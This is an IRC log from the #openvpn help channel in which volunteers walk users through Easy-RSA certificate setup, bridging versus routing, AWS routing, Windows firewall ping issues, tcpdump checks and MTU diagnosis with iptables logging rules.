yw 15:00 < benkay> i'll take all the tips you care to share 15:00 < pekster> rob0: Oh, btw, generation of keypairs off the CA system gets easier in my codebase too :) 15:01 < benkay> well, then. let's return to the original question: what kind of dumb am I engaging in that `source ./vars` followed by `./clean-all` returns `please source the vars script first` ? 15:01 < pekster> If you're running it through sudo, your environment has changed 15:01 < pekster> 'vars' just puts the configuration Easy-RSA expects into the environment, so changing users messes with that 15:01 < benkay> makes sense. 15:02 < pekster> Don't run it through sudo. Better yet, take the time to create a new account, maybe call it 'pki' or such. Then you perhaps start your PKI tasks by first doing: sudo su - pki 15:02 < pekster> Enter your user's sudo password, and you elevate (as root) to become that user. *then* you source vars and continue as normal, doing everything as the pki user 15:03 < benkay> awesome. 15:03 < benkay> that makes a whole lot of sense. 15:03 < benkay> I really appreciate your patience. 15:03 < rob0> I just have my CA in my regular user account. 15:04 < pekster> Depends on what you use the box for. I have a dedicated 'admin' host, and PKI tasks are all handled by a role account. Then again, I like the separation of duty :) 15:05 < rob0> if my user account got pwn3d, I'd be in a world of hurt :) 15:05 < pekster> Not as much that, but I don't normally even *want* access to read/backup/overwrite/destroy those files unless I am specifically performing PKI tasks 15:05 < rob0> and that's true on more than one system, unfortunately 15:06 -!- tcamuso_ [tcamuso@nat/redhat/x-stzdjglvmiahqwgn] has quit [Ping timeout: 258 seconds] 15:06 < rob0> At least my SSH keys are encrypted with not likely guessable passphrases. 15:07 < pekster> <3 ssh-agent 15:07 < pekster> Of course, I'm OCD about my interactive login security, so SSO is nice 15:09 < benkay> so here's my plan. double check if you're willing? 15:10 < benkay> create user pki, give strong password, sudo su - pki, `source ./vars` `./clean-all` etc 15:10 < benkay> do all open vpn stuff as user pki 15:11 < pekster> You don't need to give the account any password if you'll su into it 15:11 < benkay> the more you know! 15:11 < benkay> thanks, pekster. 15:11 < pekster> Otherwise, yes 15:11 < benkay> groovy. 15:12 < benkay> let's try it! 15:12 < pekster> You could do it as your user too as rob0 noted. I like unique accounts for sensitive ops, but there's no single or "right" way to do most of this 15:13 < pekster> Some people use removable media for their PKI (USB stick or such) so it can be kept offline. Some use a completely disconnect computer not even online. All depends on your goals and security needs 15:14 < benkay> i'm running this all in /etc/openvpn/easy-rsa, which out of the box does not permit my pki user to create things 15:14 < pekster> You shouldn't do that (did you miss the big warning to this end in the vars comments?) Copy it somewhere else 15:14 < pekster> Probably under /home/pki/ in your setup 15:17 < digilink> hey guys... have a ?. I am thinking about deploying an OpenVPN tap point to point VPN for layer 2 convenience from one location to another. I will be running Debian linux on either side, the server side only has one nic which is attached to the subnet I am trying to extend, but the client side will have two nic's, one for an already established network, and the other dedicated to the VPN that 15:17 < digilink> I would like to attach to a switch. Im at a bit of a loss on what to do on the client side however, will I need to bridge the TAP interface like on the server and then just plug it into the switch? I am wanting to do full layer 2 (DHCP, local DNS, etc) back to my subnet at the server side is my goal... 15:18 < pekster> !bridging 15:18 <@vpnHelper> "bridging" is (#1) Using bridges is either completely stupid or clever. It is stupid if you do it because you think it is easier. It is clever if you're a network knowledgeable person who understands networking very well and knows why routing won't fit for you or (#2) See also https://community.openvpn.net/openvpn/wiki/BridgingAndRouting 15:18 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 15:18 < pekster> The guide may be useful. In short, you create a bridge interace that holds the IP you want to use and add the NIC and tap device to the bridge as members 15:19 < rob0> Removable media for a PKI is a great idea. What is NOT a good idea is for that media to be a VM image. :) It's better to run easy-rsa in Windows than to run it on a virtual machine with no decent entropy source. 15:19 < benkay> ah, I see. and then when I edit the config files for my tcp/udp instances, i'll point at the keys in /home/pki/whatever 15:19 < rob0> (I mention this because I had to talk a client out of doing that once.) 15:19 < pekster> rob0: Yea, same issue with bootable liveCDs and such too actually. Even if you boot it on a system with a reak disk, it won't generally have built up much/any useful entropy if it's a one-shot setup 15:19 < digilink> pekster: thanks, that's what I thought. so I would just create the bridge on the client side and assign the IP to it? 15:20 < pekster> Yup 15:20 < digilink> gotcha.... thanks much :) 15:21 < pekster> If it's just between those 2 systems you can just statically define it. Then you can either manage the tap device in your OS on boot and tell OpenVPN to use tap0 specifically (not just a dynamic tap which would create tap1 if tap0 exists) or you can let openvpn dynamically manage it and use a script to add the device to the bridge 15:22 < pekster> It's often a less complex setup to use routing and a DHCP forwarder, but it sounds like you have a clue already and may want bridging for other reasons so I won't scold you too much for that :) 15:22 < digilink> one other thing, the bridge interface will need to be on the same subnet as I am attempting to extend correct? or do they need to be unique like in a routed setup? 15:22 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 258 seconds] 15:23 < pekster> You generally want them on the same subnet, yes. Technically you can have as many subnets on a L2 network as you want, but that's not often done 15:23 < pekster> For instance, I'm running an IPv4 and IPv6 subnet at home, both on the same broadcast domain. I could just as easily add another IPv4 network too, if I wanted 15:23 < digilink> this should be fun hehe... I'm doing routing now and it works, but having full layer 2 would be nice :) 15:24 < pekster> If it's just DNS/DHCP, I'd suggest routing is better with a dhcp forwarder agent at the remote site. But, your call of course 15:24 < digilink> not sure how my bandwidth will hold up either, I have 30/6 on one end, 16/4 on the other 15:25 < pekster> Remember that local LAN clients will get fed the default gateway across the VPN, so if the link goes down, so does their Internet access (unless you're handling that specially with DHCP classes and handing out different gateways, in which case you really shouldn't be bridging to begin with) 15:25 < digilink> Ill definitely experiment, in the end the routed setup may be better. the biggest thing I'm after would be able to see my NAS', bonjour devices, printers, etc 15:26 < pekster> Yea, sounds to me like you should set up DNS properly, not bridge 15:26 < digilink> DNS is working, I can connect to things now, but wanted to push the envelope by trying out TAP as I've never done it 15:34 -!- brute11k [~brute@89.249.231.173] has quit [Quit: Leaving.] 15:44 < benkay> would someone confirm this for me? client certificates need to reside in /etc/openvpn/keys/, correct? 15:45 < rob0> Your config defines where your certificates should be. If it contains a "cd /etc/openvpn" (as is very common) you would use paths relative to /etc/openvpn in the rest of the config. 15:46 < benkay> thanks rob0. 15:46 < rob0> Technically you can put any files anywhere you want, but /etc/openvpn is a sane standard. 15:46 < benkay> clarification: the files that remain on the vpn server are the "certificates", correct? I've already verified that I don't want to leave the "keys" on there. 15:47 < rob0> The server needs its own key, dhparam, its own cert, and the CA cert. 15:47 < benkay> ah ha 15:47 < rob0> Clients need their own key and cert, and the CA cert. 15:49 < benkay> but the server doesn't need the client certs? 15:50 < benkay> oh of course not if i signed them during generation on the server 15:50 < benkay> ... 15:50 < benkay> right? 15:51 < pekster> The server does not need any client certs. It verifies a client is valid by checking the signature on the cert the client hands over against the server's ca.crt file 15:55 < benkay> cool. that's what I thought. 16:01 < hrenovo> pekster: you were right, it was the client side firewall. I turned it off entirely and now I can ping the client where the firewall is turned off from both the server, and another client. 16:02 < hrenovo> So instead of turning windows 7 firewall off, what rule should be added in windows 7 firweall to allow client-to-client communication including ping ? 16:03 < pekster> Turn it off on the interface? 16:03 < pekster> And maybe go find yourself an OS that lets you edit the firewall rules properly? 16:04 -!- teknoprep [~quassel@unaffiliated/teknoprep] has joined #openvpn 16:04 < teknoprep> hi all 16:04 < teknoprep> i have installed openvpn AMI on EC2 16:04 < teknoprep> i am unable to route traffic unless i use NAT 16:05 < pekster> In the network control deal you can turn on/off the firewall per-interface. I often just allow inbound traffic by interface since I mostly trust the VPN. In theory that allows other clinets to pound your open services (which on Windows, might be more than you think.) Again, the "right" solution is to secure your services, possibly by running an OS that handles it better 16:05 < pekster> teknoprep: Where are you expecting to route to? Unless you set up an internal network of VMs that's aware of the return route for the VPN network, that's completely normal 16:06 -!- Keshl [~Purple@24.115.178.18.res-cmts.gld.ptd.net] has quit [Ping timeout: 256 seconds] 16:06 < teknoprep> i setup a static route on the box i am attempting to access... this route points to the LAN ip of the OpenVPN EC2 server.... this OVPN server is running on the same subnet... so traffic would be as follows ... Rmote Client ---- OVPN External IP NAT'd to OVPN Internal IP ---- OVPN BOX LAN --- Some Server on same LAN 16:07 < teknoprep> so on the box that is on the same subnet in EC2 as OVPN... i have already setup the static route for the Remote Client Network 16:07 < pekster> You need to set up an internal netwnonrk on AWS's side; AWS won't route private IP space for your VPNs for you 16:08 < teknoprep> i have an internal network on the AWS side 16:08 < teknoprep> 10.254.1.0/24 16:08 < teknoprep> OVPN is 10.254.1.10 ... my other server is 10.254.1.9 16:08 < pekster> Ah, k. Then a proper return route for your $VPN_NET/$CIDR via 10.254.1.10 should do it, plus relevant firewall rules and routing on the server 16:08 < pekster> Basically, all of this: 16:08 < pekster> !serverlan 16:08 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 16:09 < pekster> (assuming OpenVPN as your server on the EC2 host) 16:09 < pekster> Otherwise see !clientlan 16:09 < teknoprep> route add -net j10.2.1.0 netmask 255.255.255.0 gw 10.254.1.10 16:09 < teknoprep> i have already done that 16:09 < pekster> There's a lot more on that troubleshooting flowchart than that... 16:10 < teknoprep> i have already done your flowchart 16:10 < pekster> Follow each step, and if you're still confused, start tcpdumping packet flow 16:10 < teknoprep> i enabled routing on OpenVPN 16:10 < pekster> Well, then what part did you determine was the problem? 16:10 < teknoprep> i disabled the firewall compeletely 16:10 < teknoprep> i believe the OpenVPN box is not routing traffic properly 16:10 < pekster> The flowchart ends with you successfully being able to ping things 16:10 < teknoprep> from one network to another 16:10 < pekster> So, how can you have "done the flowchart" and still have problems 16:11 < pekster> So, enable routing? Like the bot output says? 16:11 < pekster> !ipforward 16:11 <@vpnHelper> "ipforward" is (#1) please choose between !linipforward !winipforward !osxipforward and !fbsdipforward or (#2) ip forwarding is needed any time you want packets to flow from 1 interface to another, so from tun to eth, eth to tun, tun to tun, etc etc. it must be enabled in the kernel AND allowed in the firewall 16:11 < teknoprep> i can ping from my remote network to the OpenVPN box... all IP's of it... both LAN IP's and OVPN routed networking ip's 16:11 < pekster> Okay, great. That's step 1. 16:11 < pekster> (well, and 2) 16:11 < teknoprep> from the other AWS server i can ping the LAN ip of the OVPN server 16:11 < teknoprep> the route is already configured on my remote client 16:12 < pekster> Via a push from the server, to the peered VPN IP? 16:12 < teknoprep> i believe so... i can't find that option in the OpenVPN Web Admin 16:12 < pekster> "Web Admin" 16:12 < teknoprep> other than setting the remote network subnet 16:12 < teknoprep> OpenVPN Access Server 16:12 < pekster> If you're using "Access Server" you're in the wrong place. This channel is for the GPL OpenVPN project, not the commercial closed-source thing 16:12 < teknoprep> is what i am using 16:13 < pekster> !as 16:13 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server 16:13 < pekster> We deal with the open-source project only here 16:13 < teknoprep> bah... i'll load up an openVPN server then 16:13 < teknoprep> i thought this was the same thing 16:13 < pekster> Nope. There's absoutely no "Web GUI" in the GPL side :) 16:13 < teknoprep> i use PFsense Gui 16:13 < pekster> It's also open-source and free to use, contribute, and modify 16:14 < rob0> !pfsense 16:14 <@vpnHelper> "pfsense" is dont use the web gui for configuring openvpn, you need to understand the config and logfiles 16:14 < teknoprep> yes i understand what GPL CDDL and whatelse 16:14 < pekster> AS is for people who want to pay for support and pretty UIs. Which is fine if that's the goal (it's not mine) :) 16:14 < pekster> IIRC you get for free "5 users for testing" or something. I never bothered to read far enough to find out what "testing" is defined to be, legally 16:14 < teknoprep> your at this point useless 16:15 < teknoprep> keep praising your "i hate web gui's" 16:15 < rob0> heh 16:15 < teknoprep> i didn't come here to debate free vs paid 16:15 < pekster> You're in the wrong channel if you want help with a frontend. It could be worse: I could turn out to be RMS :D 16:15 < rob0> You should not plan to come into a channel and ask for help, then call the helpers "useless". 16:16 < pekster> Now, I'll go take my useless self and go to some development work. You know, on OpenVPN 16:16 < rob0> It never ceases to amaze me how many people think that works! 16:16 < rob0> Guess what? It usually backfires. 16:16 < teknoprep> thanks for the life lesson 16:17 < teknoprep> i'll now change my attitude towards all people who like to be argumentative yet still useless 16:17 < rob0> teknoprep, you're useless to us also, FWIW. Want to work on my car for me? 16:17 < teknoprep> i agree 16:17 < teknoprep> i didn't come here giving anything back 16:17 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has quit [Ping timeout: 240 seconds] 16:18 < teknoprep> i do like how you are defending the average attitude of most IRC users 16:19 < pekster> No one expects that. We do expect relative politeness though. 16:20 < teknoprep> so i should do what you do and just compeletely stop the conversations i have with people when i do not agree with the conversation topic and then change it to what i think is right 16:20 < teknoprep> ?? 16:20 < rob0> "your[sic] at this point useless" does not meet the politeness test. Perhaps you could say: "Oops, you're right, I am sorry." 16:21 < rob0> but anyway, I have to go work on the car :( 16:21 < teknoprep> pay someone else to do it 16:21 < rob0> can't afford it 16:21 < teknoprep> you seem bright 16:21 < teknoprep> why waste time on a car... 16:23 < teknoprep> investing time into something that makes money is more valuable... i would in your situation find a way to make money with your time so that you can afford it 16:23 < teknoprep> putting time into a car is a waste worse than the money you would spend getting it fixed.. in almost every situation 16:25 -!- mode/#openvpn [+o pekster] by ChanServ 16:25 <@pekster> Last warning 16:26 < teknoprep> lol 16:26 < teknoprep> later 16:26 -!- teknoprep [~quassel@unaffiliated/teknoprep] has left #openvpn ["http://quassel-irc.org - Chat comfortably. Anywhere."] 16:26 -!- mode/#openvpn [-o pekster] by ChanServ 16:26 * jzaw 16:26 < pekster> Self-solving problem, apparently. 16:26 < digilink> trolls are fun 16:26 < digilink> :/ 16:26 < pekster> Moreso when they self-ban too :) 16:26 < pekster> Saves me a command 16:26 < digilink> hehe indeed :) 16:27 < jzaw> i was going blue from holding my breath for when he'd give up 16:27 < digilink> same here lol 16:28 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 16:30 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 16:43 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Quit: emmanuelux] 16:54 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 276 seconds] 17:11 -!- master_o1_master [~master_of@p4FF24555.dip.t-dialin.net] has joined #openvpn 17:14 -!- master_of_master [~master_of@p4FF24B99.dip.t-dialin.net] has quit [Ping timeout: 252 seconds] 17:19 -!- Orbi [~opera@anon-186-54.vpn.ipredator.se] has left #openvpn [] 17:22 -!- corretico [~luis@190.211.93.38] has quit [Read error: No route to host] 17:27 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 17:38 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 272 seconds] 17:41 < jzaw> ping pekster 17:44 < jzaw> what happens [bad?] if im routing via taps rather than tuns ? 17:45 < jzaw> i get that for bridging id have to use tap 17:46 < Aprogas> You are working on a different network layer if you do that. 17:46 < jzaw> is there any advantage to routing on tuns than taps 17:46 < Aprogas> In certain situations, probably. 17:46 < Aprogas> If you feel tap better suits your purposes, then use that. 17:46 < jzaw> 30B overheads ? things like that? 17:47 < jzaw> well ... tap just takes two ips ... one each end from a /30 .. no need for topology or owt 17:47 < jzaw> seems easier 17:47 < Aprogas> I only use OpenVPN to make some SNMP-servers reachable from a central monitoring software, without having to run those SNMP-server listening on the public internet (they run as root after all). 17:48 < jzaw> ive managed to get a /29 for the client lan and /30 for the taps 17:48 * jzaw nods 17:48 < Aprogas> So I only care about transmitting UDP and not about IP, so tun seemed fine for my purposes. 17:49 < jzaw> ive done this for my FiL so that even if the isp take his pub ip off him (me) ill still be able to get in and admin his kit 17:49 < jzaw> im using tcp 17:49 < jzaw> cos its about 2,000km+ 17:49 < jzaw> and ive found voip to be less artifacty / poppy / lossy with a tcp tun 17:50 < jzaw> even though voip itself is udp 17:52 < Aprogas> I have to go. 17:52 < jzaw> 0/ 17:56 -!- dlucio [~dieu@CPEbcc8100f9978-CMbcc8100f9975.cpe.net.cable.rogers.com] has quit [Quit: Konversation terminated!] 17:56 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 18:01 -!- mallxs [~mallxs@84.246.31.190] has quit [Read error: Connection reset by peer] 18:02 -!- mallxs [~mallxs@84.246.31.190] has joined #openvpn 18:05 -!- digilink [~digilink@unaffiliated/digilink] has quit [Quit: ZNC - http://znc.in] 18:06 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn 18:12 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 260 seconds] 18:15 -!- TheWarden [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 19.0.2/20130307023931]] 18:24 -!- master_o1_master [~master_of@p4FF24555.dip.t-dialin.net] has quit [Read error: Operation timed out] 18:26 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Quit: WeeChat 0.3.8] 18:29 -!- master_of_master [~master_of@p4FF24A9A.dip.t-dialin.net] has joined #openvpn 18:34 -!- master_o1_master [~master_of@p4FF24A9D.dip.t-dialin.net] has joined #openvpn 18:34 -!- master_of_master [~master_of@p4FF24A9A.dip.t-dialin.net] has quit [Ping timeout: 252 seconds] 18:41 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has joined #openvpn 18:41 < hrenovo> hello again everyone 18:41 < hrenovo> I come with questions again ) 18:51 < Poster> I'm guessing the question would get you closer to the answer 18:54 -!- MaynardWaters [~asdfjkl@c-71-238-30-69.hsd1.mi.comcast.net] has quit [Remote host closed the connection] 19:00 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 19:09 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Ping timeout: 272 seconds] 19:10 -!- meepmeep [meepmeep@212.24.104.229] has joined #openvpn 19:17 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 19:19 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Quit: WeeChat 0.4.0] 19:20 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 19:22 -!- Volkswagner [~eric@cpe-24-161-55-139.hvc.res.rr.com] has joined #openvpn 19:23 < hrenovo> Poster: hi ) 19:23 < hrenovo> https://forums.openvpn.net/topic12479.html 19:23 <@vpnHelper> Title: OpenVPN Support Forum openvpn server cannot ping the client : Server Administration (at forums.openvpn.net) 19:23 < hrenovo> I have been typing my question on the forums. 19:23 < hrenovo> sorry for the delay 19:24 < hrenovo> my nick there is vmlxnetwork 19:27 < Poster> try tcpdump on the openvpn server 19:27 < Poster> you can also check arp cache 19:28 < Poster> since you can ping the server, you have layers 2 and 3 in place 19:29 -!- master_o1_master [~master_of@p4FF24A9D.dip.t-dialin.net] has quit [Ping timeout: 246 seconds] 19:30 < hrenovo> Poster: tcpdump ? 19:31 -!- master_of_master [~master_of@p4FF24F9F.dip.t-dialin.net] has joined #openvpn 19:33 < Poster> http://www.tcpdump.org/ 19:33 <@vpnHelper> Title: TCPDUMP/LIBPCAP public repository (at www.tcpdump.org) 19:33 < hrenovo> install tcpdump on the server? 19:34 < Poster> what OS is the server? 19:34 < hrenovo> Debian 6 19:34 < Poster> sudo apt-get install tcpdump 19:35 < hrenovo> installed 19:36 -!- master_o1_master [~master_of@p4FF24D22.dip.t-dialin.net] has joined #openvpn 19:37 < Poster> ok so what is the interface name you're using for VPN clients? 19:37 < hrenovo> tun0 19:38 < Poster> ok so type 19:38 < Poster> sudo tcpdump -i tun0 icmp 19:38 < Poster> then in another window try to ping a client 19:38 < Poster> you'll probably see the icmp echo request leave, but no response 19:39 -!- master_of_master [~master_of@p4FF24F9F.dip.t-dialin.net] has quit [Ping timeout: 264 seconds] 19:42 -!- master_of_master [~master_of@p4FF24C20.dip.t-dialin.net] has joined #openvpn 19:44 < hrenovo> Poster: yup I see it there 19:44 < hrenovo> Poster: but no ping reply in the other putty window 19:44 < hrenovo> 20:41:48.065570 IP 10.8.0.1 > 10.8.0.6: ICMP echo request, id 11444, seq 1, length 64 19:45 -!- master_o1_master [~master_of@p4FF24D22.dip.t-dialin.net] has quit [Ping timeout: 260 seconds] 19:46 < Poster> which corresponds to the no response 19:47 < hrenovo> 10.8.0.6 19:47 < hrenovo> pinging from 10.8.0.1 to 10.8.0.6 19:48 -!- jaded-g0n [~root@113.210.96.159] has joined #openvpn 19:48 -!- raidz is now known as raidz_away 19:48 < jaded-g0n> hello 19:48 < jaded-g0n> anyone here? 19:48 < jaded-g0n> i need some love and help 19:49 -!- jaded-g0n [~root@113.210.96.159] has quit [Client Quit] 19:49 -!- jaded-g0n [~pizo@113.210.96.159] has joined #openvpn 19:50 < Poster> ask away 19:51 < Poster> hrenovo: what you're seeing corresponds to some type of packet filtering on the client side 19:52 < hrenovo> Poster: comparing to the tcpdump where there is a reply, I can clearly see in the output that there is only request, but no reply. 19:52 < Poster> hence the request being sent but blocked and not responded to 19:53 < hrenovo> basically, what do they normally do windows7 clients ? 19:53 -!- benkay [~benkay@67.50.19.230] has quit [Quit: benkay] 19:53 < Poster> yep 19:53 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 19:53 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 19:53 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 19:54 -!- mode/#openvpn [+o krzee] by ChanServ 19:54 < hrenovo> I guess my question is not clear 19:55 < hrenovo> I have 2 windows 3 windows 7 clients. I'm sure there are many others using windows 7 as openvpn clients 19:56 < Poster> windows 7 firewall is on by default 19:56 < Volkswagner> greetings 19:56 < Volkswagner> I have a working server on Netgear WNDR3800 running OpenWRT Backfire 19:56 < hrenovo> so what do they normally do in the firewall of windows 7 clients to make it pingable without having to turn off the firewall for openvpn TAP interface? 19:57 < Poster> you'd have to make an exception 19:57 < Poster> http://answers.microsoft.com/en-us/windows/forum/windows_7-networking/how-to-enable-ping-response-in-windows-7/5aff5f8d-f138-4c9a-8646-5b3a99f1cae6 19:57 <@vpnHelper> Title: How to enable ping response in windows 7 - Microsoft Community (at answers.microsoft.com) 19:58 < Volkswagner> Windows clients connect via OpenVPN GUI, server config = http://pastebin.com/ThFiy9tc 20:00 < Volkswagner> Clients are behind dsl router/modem Dlink DSL-2750 20:01 < Volkswagner> Is it possible to install a second router (WNDR3700 running openwrt) behind the Dlink to act as the client with several devices hard wired so they all can be clients? 20:01 < Volkswagner> I'm not sure if this is a standard setup or not. 20:03 < Volkswagner> The WNDR3700 would be strictly for clients needing to connect to the VPN only. 20:03 < Poster> are you talking about a WNDR3700 linking to the existing OpenVPN server and bridging the networks? 20:04 < Volkswagner> Poster, I believe you are correct 20:04 < Volkswagner> The clients will actually be ip phones 20:05 < Poster> yes you can do that, though you will need to do work out some addressing method 20:05 < Poster> when linking LANs together, you may want to consider the tun adapter type and route subnets across 20:05 < Volkswagner> or the WNDR 3700 would be the sole client, right? 20:05 < Poster> versus the common tap method for mobile clients 20:05 < Poster> well I'm assuming with ip phones you'd want full routing between the phones and remote network 20:06 < Poster> if you don't do that, the WNDR3700 would have to perform NAT across the VPN link 20:06 < Poster> so all remote clients would appear to be 1 IP address, in some cases that is ok, though I am unsure how your phones will behave 20:07 < Volkswagner> Could I hard code individual addresses to the ports on the WNDR3700? 20:07 < Poster> are you talking about DHCP on the LAN side? 20:08 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Quit: This computer has gone to sleep] 20:08 < Volkswagner> Originally I thought I could "bridge" the WNDR 3700 and have the ports act like a switch getting DHCP from the VPN Server like current clients do. 20:09 < Volkswagner> DHCP that is :) 20:10 < Poster> bridging is a possibility, but it can cause trouble if there is a lot of broadcast traffic 20:10 < Poster> unless you specifically need a bridge, routing is a more efficient solution 20:10 < Poster> in a routed solution, you would have two separate subnets on each side, then the OpenVPN link would tie the two together 20:10 < Volkswagner> I still need to learn the difference. Been reading, but it's just not sinking in 20:11 < Poster> ok in a bridge, the same IP range exists for LAN and VPN clients 20:11 < Poster> if a LAN client sends out a broadcast packet, that broadcast traffic will reach all the VPN clients 20:12 < Poster> you can really think of it as a long, slower line directly into the remote network 20:12 < Volkswagner> OK, so my current setup is bridged. 20:12 < Poster> a routed connection does not pass any broadcast traffic, there are unique subnets (even small ones!) separating the two 20:13 < Volkswagner> Functionally I don't really need bridged. No file sharing, etc. 20:13 < Poster> it doesn't mean you can't access it, it just means it's one one big subnet 20:13 < Poster> for your example, you could have a routed connection like this: 20:14 < Poster> 192.168.0.0/24 <-OpenVPN Server-> 10.0.0.1 <-[OpenVPN Link]-> 10.0.0.2 <-OpenVPN Client-> 192.168.1.0/24 20:14 < Poster> so a client in 192.168.0.0/24 can ping a system in 192.168.1.0/24 network 20:14 < Poster> if you were to trace from say 192.168.0.10 to 192.168.1.10, it would be 20:14 < Poster> 192.168.1.1 (LAN side of OpenVPN server) 20:15 < Poster> 10.0.0.2 (Remote side of OpenVPN link, on OpenVPN Client) 20:15 < Poster> 192.168.1.10 (Remote host) 20:16 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 20:18 < Volkswagner> Poster, would 10.0.0.2 be on the Dlink LAN, or would the Dlink still need to be a different network? 20:19 < Poster> so in that example, the 10.0.0.2 would be the OpenVPN client 20:19 < Poster> on the WNDR3700 20:19 < Poster> you can really break it into smaller pieces 20:19 < Poster> forgetting the two networks, you have your OpenVPN link between Dlink and WNDR3700 20:19 < Poster> the Dlink is 10.0.0.1 and WNDR3700 is 10.0.0.2 20:20 < Poster> they can ping eachother, ssh, whatever across that link 20:20 < Poster> all we're doing is using that link to route a subnet back and forth 20:20 < Poster> so Dlink has a route to 192.168.1.0/24 via 10.0.0.2 (WNDR3700) 20:20 < Poster> and WNDR3700 has a route to 192.168.0.0/24 via 10.0.0.1 (Dlink) 20:23 < Volkswagner> The OpenVPN link is between WNDR3700 and WNDR3800, isn't it? 20:23 < Poster> yep 20:24 < Poster> you just use that link to pass the network traffic between them 20:25 < Volkswagner> Poster, this is most helpful... 20:26 < Poster> once you get the building blocks in place you can do a lot of cool stuff 20:26 < Volkswagner> The WNDR3700 can have DHCP turned on so multiple clients in 192.168.1.0/24 can utilize the link, right? 20:26 < Poster> yep 20:27 < Poster> you'd treat them just like you were sharing out an Internet link 20:27 < Poster> except it has a route (via the OpenVPN link) to the remote LAN too 20:27 -!- spacedust [~info@unaffiliated/cosmicblue] has joined #openvpn 20:28 < spacedust> i've read it on a site that for shorer distances between vpn server and client i should use UDP and for longer TCp 20:28 < spacedust> how much is longer ? :) 20:28 < spacedust> in miles milliseconds / or how ? :) if true at all :) 20:29 < Poster> it's one of those "depends" answers 20:29 < Volkswagner> spacedust, interesting... if my clients are only ip phones, all traffic is UDP :) 20:29 < Poster> UDP is lighter, as a result faster, but doesn't do any type of error correcting 20:30 < Poster> it also can sometimes have trouble with some implementations of NAT that timeout UDP sessions too quickly 20:30 < Poster> since there is no handshake and sequencing numbers, connection tracking just has to give it a timeout of outbound and (inverted) inbound traffic 20:31 < Poster> TCP is heavier, a bit slower, does error correcting and is not as likely to be subject to trouble with NAT 20:31 < spacedust> and what is the difference is overhead ? 20:32 < spacedust> tryed to calculate my MTU :) 20:34 < Volkswagner> Poster, thanks so much. I'm off to find documentation, while I wait for the WNDR3700 to arrive. 20:35 < Poster> ok sounds good, you can also use computers to simulate/setup things as well, though as you've found, there's several solid state devices that can as well 20:35 < Poster> spacedust: unless you're running something that requires the fragment bit to not be set, you probably don't need to worry about setting your MTU 20:35 < Volkswagner> Oh, do you know of any free simulators? 20:36 < Volkswagner> I do have some space on VM host 20:36 < spacedust> Poster: hmm 20:36 < Poster> Linux is probably going to be closest to what you're working with 20:36 < Poster> BSD is also good 20:37 < Poster> Linux is probably more popular 20:37 < spacedust> Poster: well first of all i might be connecting via pppoe then wifi then vpn so thats why i was thinking about mtu 20:37 < Poster> there's built in mechanisms to cope with frames that are too large 20:38 < Poster> if in doubt you can perform a tcpdump/wireshark capture and see if you get fragmentation needed frames 20:39 < spacedust> Poster: wow now this is fascinating :) 20:40 < spacedust> my mtu is 1492 thus i cant ping anything besides my wifi with anything higher :) 20:40 < spacedust> BUT ! now i made a vpn connecting and i can ping with 1500 , i mean 1472 ... 20:40 < spacedust> so what is going on now ? :) cause im in a bit in the shade here ... 20:41 < spacedust> so actually the vpn made my connecting better ? :) instead of 1492 my mtu is now 1500 ? :) hooooow ? :) 20:41 < Poster> not likely, it's probably being fragmented and reassembled 20:42 -!- hrenovo_ [~hrenovo@ool-4352bbfe.dyn.optonline.net] has joined #openvpn 20:42 < Poster> what OS are you running on either side? 20:43 < spacedust> Poster: linux both sides, and im using ping with -M do 20:44 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has quit [Read error: Connection reset by peer] 20:45 < Poster> ok you can do this 20:45 < spacedust> what ? 20:45 < Poster> sudo iptables -A INPUT -p icmp --icmp-type fragmentation-needed -j LOG --log-prefix "IPT ICMP Frag Needed: " 20:45 < Poster> sudo iptables -A OUTPUT -p icmp --icmp-type fragmentation-needed -j LOG --log-prefix "IPT ICMP Frag Needed: " 20:45 < Poster> and watch syslog for fragmentation needed 20:45 < spacedust> on the client ? 20:45 < Poster> either side 20:49 < spacedust> i added in on the client 20:49 < spacedust> did -M dont 14000 should be fragmented 20:49 < spacedust> and there is no sign in dmesg nor /var/log/messages 20:49 -!- hrenovo_ [~hrenovo@ool-4352bbfe.dyn.optonline.net] has quit [Quit: I quit] 20:54 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has joined #openvpn 20:56 < hrenovo> sorry I got kicked off 20:56 < hrenovo> and I don't have logging enabled 20:57 